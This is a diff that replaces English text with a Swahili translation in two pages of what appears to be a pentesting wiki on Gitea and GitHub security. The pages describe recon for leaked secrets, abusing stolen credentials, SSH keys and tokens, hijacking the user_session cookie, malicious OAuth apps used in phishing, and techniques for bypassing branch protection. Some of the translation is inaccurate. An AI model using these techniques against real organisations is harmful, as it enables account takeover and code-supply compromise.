+Muundo wa msingi wa mazingira ya Gitea ni kuunganisha repos kwa **organization(s),** kila moja inaweza kuwa na **repositories kadhaa** na **teams kadhaa.** Hata hivyo, kumbuka kwamba kama ilivyo katika github, watumiaji wanaweza kuwa na repos nje ya shirika.
-Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
+Zaidi ya hayo, **mtumiaji** anaweza kuwa **mwanachama** wa **mashirika tofauti.** Ndani ya shirika, mtumiaji anaweza kuwa na **idhini tofauti juu ya kila repository.**
-A user may also be **part of different teams** with different permissions over different repos.
+Mtumiaji pia anaweza kuwa **sehemu ya teams tofauti** zikiwa na idhini tofauti juu ya repos tofauti.
-And finally **repositories may have special protection mechanisms**.
+Na hatimaye, **repositories zinaweza kuwa na mifumo maalum ya ulinzi.**
## Permissions
### Organizations
-When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
+Wakati **shirika linaundwa,** timu inayoitwa **Owners** inaundwa na mtumiaji anawekwa ndani yake. Timu hii itatoa **ufikiaji wa admin** juu ya **shirika,** hizo **idhini** na **jina** la timu **haziwezi kubadilishwa.**
-**Org admins** (owners) can select the **visibility** of the organization:
+**Org admins** (wamiliki) wanaweza kuchagua **mwonekano** wa shirika:
-- Public
-- Limited (logged in users only)
-- Private (members only)
+- Umma
+- Kizuiwaji (watumiaji walioingia tu)
+- Binafsi (wanachama tu)
-**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos.
+**Org admins** wanaweza pia kuonyesha ikiwa **repo admins** wanaweza **kuongeza au kuondoa ufikiaji** kwa teams. Wanaweza pia kuonyesha idadi ya juu ya repos.
-When creating a new team, several important settings are selected:
+Wakati wa kuunda timu mpya, mipangilio kadhaa muhimu inachaguliwa:
-- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all.
-- It's also indicated **if members can create new repos** (creator will get admin access to it)
-- The **permissions** the **members** of the repo will **have**:
- - **Administrator** access
- - **Specific** access:
+- Inabainishwa **repos za shirika ambazo wanachama wa timu wataweza kufikia**: repos maalum (repos ambapo timu imeongezwa) au zote.
+- Pia inabainishwa **ikiwa wanachama wanaweza kuunda repos mpya** (mwandikaji atapata ufikiaji wa admin kwa hiyo)
+- **Idhini** ambazo **wanachama** wa repo wata **kuwa nazo**:
+- **Ukurugenzi** wa ufikiaji
+- **Ukurugenzi** maalum:
.png>)
### Teams & Users
-In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
+Katika repo, **org admin** na **repo admins** (ikiwa inaruhusiwa na shirika) wanaweza **kusimamia majukumu** yanayotolewa kwa washirikiano (watumiaji wengine) na teams. Kuna **3** majukumu yanayowezekana:
-- Administrator
-- Write
-- Read
+- Mkurugenzi
+- Andika
+- Soma
## Gitea Authentication
### Web Access
-Using **username + password** and potentially (and recommended) a 2FA.
+Kutumia **jina la mtumiaji + nenosiri** na labda (na inapendekezwa) 2FA.
### **SSH Keys**
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
+Unaweza kuunda akaunti yako na funguo moja au kadhaa za umma zinazoruhusu funguo husika za **binafsi kufanya vitendo kwa niaba yako.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
#### **GPG Keys**
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
+Huwezi kujifanya kuwa mtumiaji kwa funguo hizi lakini ikiwa huzitumii inaweza kuwa inawezekana kwamba **unagundulika kwa kutuma commits bila saini.**
### **Personal Access Tokens**
-You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
+Unaweza kuunda token za ufikiaji wa kibinafsi ili **kutoa programu ufikiaji wa akaunti yako.** Token ya ufikiaji wa kibinafsi inatoa ufikiaji kamili juu ya akaunti yako: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
### Oauth Applications
-Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
+Kama token za ufikiaji wa kibinafsi, **Oauth applications** zitakuwa na **ufikiaji kamili** juu ya akaunti yako na maeneo ambayo akaunti yako ina ufikiaji kwa sababu, kama ilivyoonyeshwa katika [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes hazijasaidiwa bado:
.png>)
### Deploy keys
-Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
+Funguo za kupeleka zinaweza kuwa na ufikiaji wa kusoma tu au kuandika kwa repo, hivyo zinaweza kuwa za kuvutia kuathiri repos maalum.
## Branch Protections
-Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
+Ulinzi wa branch umeundwa ili **kutopeana udhibiti kamili wa repository** kwa watumiaji. Lengo ni **kueka mbinu kadhaa za ulinzi kabla ya kuwa na uwezo wa kuandika msimbo ndani ya branch fulani.**
-The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_
+**Ulinzi wa branch wa repository** unaweza kupatikana katika _https://localhost:3000/\/\/settings/branches_
> [!NOTE]
-> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
+> Haiwezekani kuweka ulinzi wa branch katika kiwango cha shirika. Hivyo zote lazima zitangazwe kwenye kila repo.
-Different protections can be applied to a branch (like to master):
+Ulinzi tofauti unaweza kutumika kwa branch (kama kwa master):
-- **Disable Push**: No-one can push to this branch
-- **Enable Push**: Anyone with access can push, but not force push.
-- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
-- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
-- **Enable Status checks:** Require status checks to pass before merging.
-- **Require approvals**: Indicate the number of approvals required before a PR can be merged.
-- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
-- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
-- **Block merge on official review requests**: If there official review requests it cannot be merged
-- **Dismiss stale approvals**: When new commits, old approvals will be dismissed.
-- **Require Signed Commits**: Commits must be signed.
-- **Block merge if pull request is outdated**
-- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
+- **Zuia Push**: Hakuna mtu anaweza kusukuma kwenye branch hii
+- **Ruhusu Push**: Mtu yeyote mwenye ufikiaji anaweza kusukuma, lakini si kusukuma kwa nguvu.
+- **Whitelist Restricted Push**: Ni watumiaji/teams waliochaguliwa pekee wanaweza kusukuma kwenye branch hii (lakini hakuna kusukuma kwa nguvu)
+- **Ruhusu Merge Whitelist**: Ni watumiaji/teams walio kwenye orodha ya kibali pekee wanaweza kuunganishwa PRs.
+- **Ruhusu Status checks:** Hitaji ukaguzi wa hali kupita kabla ya kuunganishwa.
+- **Hitaji idhini**: Onyesha idadi ya idhini zinazohitajika kabla ya PR kuunganishwa.
+- **Zuia idhini kwa walio kwenye orodha ya kibali**: Onyesha watumiaji/teams wanaoweza kuidhinisha PRs.
+- **Zuia kuunganishwa kwenye mapitio yaliyokataliwa**: Ikiwa mabadiliko yanahitajika, haiwezi kuunganishwa (hata kama ukaguzi mwingine unapita)
+- **Zuia kuunganishwa kwenye maombi rasmi ya ukaguzi**: Ikiwa kuna maombi rasmi ya ukaguzi haiwezi kuunganishwa
+- **Futa idhini za zamani**: Wakati commits mpya, idhini za zamani zitafutwa.
+- **Hitaji Commits Zilizotiwa Saini**: Commits lazima ziwe na saini.
+- **Zuia kuunganishwa ikiwa ombi la kuvuta limepitwa na wakati**
+- **Mifumo ya faili zilizolindwa/zisizolindwa**: Onyesha mifumo ya faili za kulinda/kutozingatia dhidi ya mabadiliko
> [!NOTE]
-> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
+> Kama unavyoona, hata kama umeweza kupata baadhi ya akidi za mtumiaji, **repos zinaweza kulindwa zikizuia wewe kusukuma msimbo kwa master** kwa mfano kuathiri pipeline ya CI/CD.
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md
index cdad12b57..eb61aa4cb 100644
--- a/src/pentesting-ci-cd/github-security/README.md
+++ b/src/pentesting-ci-cd/github-security/README.md
@@ -4,7 +4,7 @@
## What is Github
-(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
+(From [here](https://kinsta.com/knowledgebase/what-is-github/)) Kwa kiwango cha juu, **GitHub ni tovuti na huduma ya msingi wa wingu inayosaidia waendelezaji kuhifadhi na kusimamia msimbo wao, pamoja na kufuatilia na kudhibiti mabadiliko kwenye msimbo wao**.
### Basic Information
@@ -14,29 +14,29 @@ basic-github-information.md
## External Recon
-Github repositories can be configured as public, private and internal.
+Github repositories zinaweza kuwekwa kama za umma, binafsi na za ndani.
-- **Private** means that **only** people of the **organisation** will be able to access them
-- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it
-- **Public** means that **all internet** is going to be able to access it.
+- **Binafsi** inamaanisha kwamba **tu** watu wa **shirika** wataweza kuzifikia
+- **Za ndani** inamaanisha kwamba **tu** watu wa **biashara** (biashara inaweza kuwa na mashirika kadhaa) wataweza kuzifikia
+- **Umma** inamaanisha kwamba **mtandao wote** utaweza kuzifikia.
-In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
+Ikiwa unajua **mtumiaji, repo au shirika unalotaka kulenga** unaweza kutumia **github dorks** kupata taarifa nyeti au kutafuta **mvuja taarifa nyeti** **katika kila repo**.
### Github Dorks
-Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
+Github inaruhusu **kutafuta kitu kwa kubainisha kama upeo mtumiaji, repo au shirika**. Hivyo, kwa orodha ya nyuzi ambazo zitakuwa karibu na taarifa nyeti unaweza kwa urahisi **kutafuta taarifa nyeti zinazoweza kuwa katika lengo lako**.
-Tools (each tool contains its list of dorks):
+Tools (kila chombo kina orodha yake ya dorks):
-- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))
-- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
-- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
+- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Orodha ya Dorks](https://github.com/obheda12/GitDorker/tree/master/Dorks))
+- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Orodha ya Dorks](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
+- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Orodha ya Dorks](https://github.com/hisxo/gitGraber/tree/master/wordlists))
### Github Leaks
-Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
+Tafadhali, kumbuka kwamba github dorks pia zinakusudia kutafuta mvuja taarifa kwa kutumia chaguzi za utafutaji za github. Sehemu hii imejikita kwa zana hizo ambazo zitafanya **kupakua kila repo na kutafuta taarifa nyeti ndani yao** (hata kuangalia kina fulani cha commits).
-Tools (each tool contains its list of regexes):
+Tools (kila chombo kina orodha yake ya regexes):
- [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
- [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog)
@@ -47,15 +47,15 @@ Tools (each tool contains its list of regexes):
- [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
> [!WARNING]
-> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
+> Unapofanya utafutaji wa mvuja taarifa katika repo na kuendesha kitu kama `git log -p` usisahau kunaweza kuwa na **matawi mengine yenye commits nyingine** yanayoshikilia siri!
### External Forks
-It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork).
+Inawezekana **kudhoofisha repos kwa kutumia ombi la kuvuta**. Ili kujua ikiwa repo ni hatarishi unahitaji zaidi kusoma mipangilio ya yaml ya Github Actions. [**Maelezo zaidi kuhusu hii hapa chini**](./#execution-from-a-external-fork).
### Github Leaks in deleted/internal forks
-Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:
+Hata kama zimefutwa au za ndani inaweza kuwa inawezekana kupata data nyeti kutoka kwa forks za github repositories. Angalia hapa:
{{#ref}}
accessible-deleted-data-in-github.md
@@ -65,154 +65,148 @@ accessible-deleted-data-in-github.md
### Member Privileges
-There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
+Kuna **privileges za msingi** ambazo zinaweza kutolewa kwa **wanachama** wa shirika. Hizi zinaweza kudhibitiwa kutoka kwenye ukurasa `https://github.com/organizations//settings/member_privileges` au kutoka kwenye [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
-- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.
-- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.
-- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.
-- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.
- - _I couldn't find this info in the APIs response, share if you do_
-- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.
- - _I couldn't find this info in the APIs response, share if you do_
-- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**
- - _I couldn't find this info in the APIs response, share if you do_
-- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.
- - _I couldn't find this info in the APIs response, share if you do_
-- **More things can be configured** in this page but the previous are the ones more security related.
+- **Ruhusa za msingi**: Wanachama watakuwa na ruhusa Hakuna/Soma/andika/Admin juu ya repos za shirika. Inapendekezwa kuwa **Hakuna** au **Soma**.
+- **Kuvuta repo**: Ikiwa si lazima, ni bora **kutokuruhusu** wanachama kuvuta repos za shirika.
+- **Uundaji wa kurasa**: Ikiwa si lazima, ni bora **kutokuruhusu** wanachama kuchapisha kurasa kutoka kwa repos za shirika. Ikiwa ni lazima unaweza kuruhusu kuunda kurasa za umma au binafsi.
+- **Maombi ya ufikiaji wa ushirikiano**: Kwa hili kuwezeshwa washirikiano wa nje wataweza kuomba ufikiaji wa GitHub au programu za OAuth kufikia shirika hili na rasilimali zake. Kwa kawaida inahitajika, lakini ikiwa si hivyo, ni bora kuizima.
+- _Sijapata taarifa hii katika majibu ya APIs, shiriki ikiwa unayo_
+- **Mabadiliko ya mwonekano wa repo**: Ikiwa imewezeshwa, **wanachama** wenye ruhusa **admin** kwa **repo** wataweza **kubadilisha mwonekano wake**. Ikiwa imezimwa, ni wamiliki wa shirika pekee wanaoweza kubadilisha mwonekano wa repos. Ikiwa **hutaki** watu kufanya mambo **ya umma**, hakikisha hii ime **zimwa**.
+- _Sijapata taarifa hii katika majibu ya APIs, shiriki ikiwa unayo_
+- **Futa na uhamasishaji wa repo**: Ikiwa imewezeshwa, wanachama wenye ruhusa **admin** kwa repo wataweza **kufuta** au **kuhamasisha** repos za umma na binafsi.
+- _Sijapata taarifa hii katika majibu ya APIs, shiriki ikiwa unayo_
+- **Ruhusu wanachama kuunda timu**: Ikiwa imewezeshwa, mwanachama yeyote wa shirika ataweza **kuunda** timu mpya. Ikiwa imezimwa, ni wamiliki wa shirika pekee wanaoweza kuunda timu mpya. Ni bora kuwa na hii imezimwa.
+- _Sijapata taarifa hii katika majibu ya APIs, shiriki ikiwa unayo_
+- **Mambo mengine yanaweza kuwekewa mipangilio** katika ukurasa huu lakini yale yaliyotangulia ndiyo yanayohusiana zaidi na usalama.
### Actions Settings
-Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`.
+Mipangilio kadhaa inayohusiana na usalama inaweza kuwekwa kwa ajili ya hatua kutoka kwenye ukurasa `https://github.com/organizations//settings/actions`.
> [!NOTE]
-> Note that all this configurations can also be set on each repository independently
+> Kumbuka kwamba mipangilio hii yote inaweza pia kuwekwa kwenye kila repo kwa kujitegemea
-- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.
- - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
-- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.
- - _I couldn't find an API with this info, share if you do_
-- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.
- - _I couldn't find an API with this info, share if you do_
-- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.
- - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
+- **Sera za hatua za Github**: Inaruhusu kuashiria ni repos zipi zinaweza kuendesha workflows na ni workflows zipi zinapaswa kuruhusiwa. Inapendekezwa **kubainisha ni repos zipi** zinapaswa kuruhusiwa na sio kuruhusu hatua zote kuendesha.
+- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
+- **Kuvuta workflows za ombi kutoka kwa washirikiano wa nje**: Inapendekezwa **kuhitaji idhini kwa wote** washirikiano wa nje.
+- _Sijapata API yenye taarifa hii, shiriki ikiwa unayo_
+- **Kendesha workflows kutoka kwa ombi la kuvuta**: Inashauriwa **kutoendesha workflows kutoka kwa ombi la kuvuta** kwani wasimamizi wa chanzo cha kuvuta watapewa uwezo wa kutumia tokens zenye ruhusa za kusoma kwenye repo ya chanzo.
+- _Sijapata API yenye taarifa hii, shiriki ikiwa unayo_
+- **Ruhusa za workflow**: Inashauriwa sana **kutoa ruhusa za kusoma tu kwa repo**. Inashauriwa kutopeana ruhusa za kuandika na kuunda/kubali ombi la kuvuta ili kuepuka matumizi mabaya ya GITHUB_TOKEN inayotolewa kwa workflows zinazokimbia.
+- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
### Integrations
-_Let me know if you know the API endpoint to access this info!_
+_Nnijulishe ikiwa unajua kiunganishi cha API kupata taarifa hii!_
-- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).
-- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).
+- **Sera ya ufikiaji wa programu za wahusika wengine**: Inapendekezwa kupunguza ufikiaji kwa kila programu na kuruhusu zile tu zinazohitajika (baada ya kuzitathmini).
+- **Programu za GitHub zilizowekwa**: Inapendekezwa kuruhusu zile tu zinazohitajika (baada ya kuzitathmini).
## Recon & Attacks abusing credentials
-For this scenario we are going to suppose that you have obtained some access to a github account.
+Kwa hali hii tutadhani kwamba umepata ufikiaji wa akaunti ya github.
### With User Credentials
-If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
+Ikiwa kwa namna fulani tayari una ruhusa za mtumiaji ndani ya shirika unaweza **kuingia tu** na kuangalia ni **majukumu gani ya biashara na shirika ulionayo**, ikiwa wewe ni mwanachama wa kawaida, angalia ni **ruhusa zipi wanachama wa kawaida wanao**, ni **makundi** gani ulipo, ni **ruhusa zipi ulizonazo** juu ya **repos**, na **jinsi repos zinavyolindwa**.
-Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+Kumbuka kwamba **2FA inaweza kutumika** hivyo utaweza kufikia taarifa hii tu ikiwa unaweza pia **kupita ukaguzi huo**.
> [!NOTE]
-> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+> Kumbuka kwamba ikiwa **utafanikiwa kuiba `user_session` cookie** (sasa imewekwa na SameSite: Lax) unaweza **kujifanya kuwa mtumiaji** bila kuhitaji ruhusa au 2FA.
-Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
+Angalia sehemu iliyo chini kuhusu [**kupita ulinzi wa matawi**](./#branch-protection-bypass) ikiwa itakuwa na manufaa.
### With User SSH Key
-Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
-
-With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:
+Github inaruhusu **watumiaji** kuweka **SSH keys** ambazo zitakuwa zikitumika kama **njia ya uthibitisho wa kupeleka msimbo** kwa niaba yao (hakuna 2FA inayotumika).
+Kwa funguo hii unaweza kufanya **mabadiliko katika repos ambapo mtumiaji ana baadhi ya ruhusa**, hata hivyo huwezi kuitumia kufikia api ya github ili kuorodhesha mazingira. Hata hivyo, unaweza kupata **kuorodhesha mipangilio ya ndani** ili kupata taarifa kuhusu repos na mtumiaji ulionao ufikiaji:
```bash
# Go to the the repository folder
# Get repo config and current user name and email
git config --list
```
+Ikiwa mtumiaji ameweka jina lake la mtumiaji kama jina lake la github unaweza kufikia **funguo za umma alizoweka** katika akaunti yake kwenye _https://github.com/\.keys_, unaweza kuangalia hili kuthibitisha kuwa funguo ya faragha uliyopata inaweza kutumika.
-If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used.
+**Funguo za SSH** zinaweza pia kuwekwa katika hifadhi kama **funguo za kutekeleza**. Mtu yeyote mwenye ufikiaji wa funguo hii ataweza **kuanzisha miradi kutoka kwenye hifadhi**. Kawaida katika seva yenye funguo tofauti za kutekeleza, faili ya ndani **`~/.ssh/config`** itakupa taarifa kuhusu funguo inayohusiana.
-**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+#### Funguo za GPG
-#### GPG Keys
-
-As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
-
-Check locally if the current user has any key with:
+Kama ilivyoelezwa [**hapa**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) wakati mwingine inahitajika kusaini commits au unaweza kugunduliwa.
+Angalia kwa ndani ikiwa mtumiaji wa sasa ana funguo yoyote kwa:
```shell
gpg --list-secret-keys --keyid-format=long
```
+### Kwa Token ya Mtumiaji
-### With User Token
+Kwa utangulizi kuhusu [**Token za Mtumiaji angalia taarifa za msingi**](basic-github-information.md#personal-access-tokens).
-For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
+Token ya mtumiaji inaweza kutumika **badala ya nenosiri** kwa Git kupitia HTTPS, au inaweza kutumika [**kujiandikisha kwenye API kupitia Uthibitishaji wa Msingi**](https://docs.github.com/v3/auth/#basic-authentication). Kulingana na mamlaka iliyounganishwa nayo unaweza kuwa na uwezo wa kufanya vitendo tofauti.
-A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.
+Token ya Mtumiaji inaonekana kama hii: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
-A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
+### Kwa Programu ya Oauth
-### With Oauth Application
+Kwa utangulizi kuhusu [**Programu za Oauth za Github angalia taarifa za msingi**](basic-github-information.md#oauth-applications).
-For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
+Mshambuliaji anaweza kuunda **Programu ya Oauth yenye uharibifu** ili kupata data/matendo ya kipaumbele ya watumiaji wanaokubali labda kama sehemu ya kampeni ya udukuzi.
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Hizi ni [mipaka ambayo programu ya Oauth inaweza kuomba](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). Ni lazima kila wakati kuangalia mipaka inayohitajika kabla ya kuzikubali.
-These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.
+Zaidi ya hayo, kama ilivyoelezwa katika taarifa za msingi, **mashirika yanaweza kutoa/kukataa ufikiaji kwa programu za upande wa tatu** kwa habari/repo/matendo yanayohusiana na shirika.
-Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+### Kwa Programu ya Github
-### With Github Application
+Kwa utangulizi kuhusu [**Programu za Github angalia taarifa za msingi**](basic-github-information.md#github-applications).
-For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
+Mshambuliaji anaweza kuunda **Programu ya Github yenye uharibifu** ili kupata data/matendo ya kipaumbele ya watumiaji wanaokubali labda kama sehemu ya kampeni ya udukuzi.
-An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Zaidi ya hayo, kama ilivyoelezwa katika taarifa za msingi, **mashirika yanaweza kutoa/kukataa ufikiaji kwa programu za upande wa tatu** kwa habari/repo/matendo yanayohusiana na shirika.
-Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+## Kuathiri & Kutumia Vibaya Github Action
-## Compromise & Abuse Github Action
-
-There are several techniques to compromise and abuse a Github Action, check them here:
+Kuna mbinu kadhaa za kuathiri na kutumia vibaya Github Action, angalia hapa:
{{#ref}}
abusing-github-actions/
{{#endref}}
-## Branch Protection Bypass
+## Kupita Ulinzi wa Tawi
-- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
- - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
-- **Dismiss approvals when new commits are pushed**: If this isnāt set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.
-- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.
- - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**
-- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.
-- **Include administrators**: If this isnāt set and you are admin of the repo, you can bypass this branch protections.
-- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
-- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
-- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
- - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
+- **Hitaji idadi ya idhini**: Ikiwa umeathiri akaunti kadhaa unaweza kukubali PR zako kutoka kwa akaunti nyingine. Ikiwa una akaunti tu kutoka ambapo ulitengeneza PR huwezi kukubali PR yako mwenyewe. Hata hivyo, ikiwa una ufikiaji wa mazingira ya **Github Action** ndani ya repo, ukitumia **GITHUB_TOKEN** unaweza kuwa na uwezo wa **kuidhinisha PR yako** na kupata idhini 1 kwa njia hii.
+- _Kumbuka kwa hili na kwa kizuizi cha Wamiliki wa Kanuni kwamba kwa kawaida mtumiaji hatakuwa na uwezo wa kuidhinisha PR zake mwenyewe, lakini ikiwa wewe ni, unaweza kuitumia vibaya kukubali PR zako._
+- **Futa idhini wakati mabadiliko mapya yanaposhughulikiwa**: Ikiwa hii haijakamilishwa, unaweza kuwasilisha msimbo halali, subiri mtu apitishe, na kuweka msimbo mbaya na kuunganisha kwenye tawi lililohifadhiwa.
+- **Hitaji mapitio kutoka kwa Wamiliki wa Kanuni**: Ikiwa hii imewashwa na wewe ni Mmiliki wa Kanuni, unaweza kufanya **Github Action kuunda PR yako na kisha kuidhinisha mwenyewe**.
